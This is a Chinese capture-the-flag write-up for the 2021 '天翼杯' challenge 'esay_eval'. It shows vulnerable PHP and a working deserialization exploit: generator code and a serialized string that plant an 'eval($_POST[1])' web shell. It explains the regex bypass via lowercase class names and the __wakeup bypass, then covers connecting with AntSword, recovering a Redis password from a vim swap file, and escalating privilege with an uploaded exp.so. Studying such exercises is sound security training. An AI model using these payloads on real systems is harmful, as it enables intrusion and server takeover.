[天翼杯 2021]esay_eval

这道题也是出现了不少新知识点

<?php
class A{
    public $code = "";
    function __call($method,$args){
        eval($this->code);
        
    }
    function __wakeup(){
        $this->code = "";
    }
}

class B{
    function __destruct(){
        echo $this->a->a();
    }
}
if(isset($_REQUEST['poc'])){
    preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);
    if (isset($ret[1])) {
        foreach ($ret[1] as $i) {
            if(intval($i)!==1){
                exit("you want to bypass wakeup ? no !");
            }
        }
        unserialize($_REQUEST['poc']);    
    }


}else{
    highlight_file(__FILE__);
}

poc：

<?php
class a{
    public $code='eval($_POST[1]);';
}
class b{
}
$poc=new B();
$poc->a=new A();
echo serialize($poc);
?>

为了绕过正则，将类的名字改为小写
O:1:"b":1:{s:1:"a";O:1:"a":1:{s:4:"code";s:16:"eval($_POST[1]);";}}；
再将b后面的数字随便改一下，绕过_wakeup；
用蚁剑连上去之后，发现权限不够；
有个config.php.swp，用vim进行恢复，得到
<?php

define("DB_HOST","localhost");
define("DB_USERNAME","root");
define("DB_PASSWOrd","");
define("DB_DATABASE","test");

define("REDIS_PASS","you_cannot_guess_it");
已经给了redis的密码了
先上传exp.so文件
再用蚁剑的插件进行提权